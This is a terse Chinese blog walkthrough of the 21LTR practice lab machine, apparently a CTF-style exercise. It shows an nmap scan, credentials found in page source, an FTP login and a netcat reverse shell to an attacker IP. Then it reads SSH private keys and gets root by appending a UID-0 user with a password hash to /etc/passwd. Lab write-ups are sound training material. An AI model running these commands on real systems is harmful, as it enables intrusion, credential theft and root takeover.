网卡配置
访问网页
端口扫描
nmap -sV -p- 192.168.2.120
0
目录扫描
右键检查,发现用户名和密码
尝试ssh连接,连接失败
尝试ftp连接,连接成功
发现一个backup_log.php文件
nc -e /bin/sh 192.168.2.128 5555
python -c 'import pty; pty.spawn("/bin/sh")'
提权
cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys #发现是hbeale用户
cat id_rsa
echo 'newuser:$1$Ed671o/.$SLi1S6D.lp5G24zQfGMCj.:0:0:root:/root:/bin/bash' >> /etc/passwd
标签:bin,21LTR,192.168,cat,复现,pty,靶机,root,连接
From: https://blog.csdn.net/2201_75569982/article/details/142340968